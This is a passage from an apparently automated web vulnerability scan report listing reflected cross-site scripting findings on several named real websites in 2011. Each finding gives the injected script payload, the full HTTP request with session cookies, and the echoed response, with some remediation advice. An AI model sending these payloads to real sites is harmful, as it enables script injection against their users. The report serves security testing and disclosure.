Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly
RNT-Time: D=104396 t=1296697268034941
RNT-Machine: 06
F5_do_compression: yes
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25362
The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:10 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly
RNT-Time: D=108020 t=1296697270345051
RNT-Machine: 03
F5_do_compression: yes
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27261
The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:09 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly
RNT-Time: D=114429 t=1296697269254262
RNT-Machine: 04
F5_do_compression: yes
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27211
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:43 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly
Content-Length: 25622
RNT-Time: D=131773 t=1296691423739902
RNT-Machine: 07
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:48 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly
Content-Length: 25600
RNT-Time: D=113558 t=1296691428704362
RNT-Machine: 03
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close
The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:37 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/
Date: Wed, 02 Feb 2011 22:01:37 GMT
Connection: close
Content-Length: 2725
var bt_ad_content285777f27fe;alert(1)//63b819cf766=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset ...[SNIP]...
2.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://citi.bridgetrack.com
Path: /a/s/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:48 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/
Date: Wed, 02 Feb 2011 22:01:47 GMT
Connection: close
Content-Length: 2739
var bt_ad_content285777=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]... net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert ...[SNIP]...
2.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1&_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'> ...[SNIP]...
2.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1&_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'> ...[SNIP]...
2.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... ipt type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e"; ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements & Anti-Fraud Protection"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1
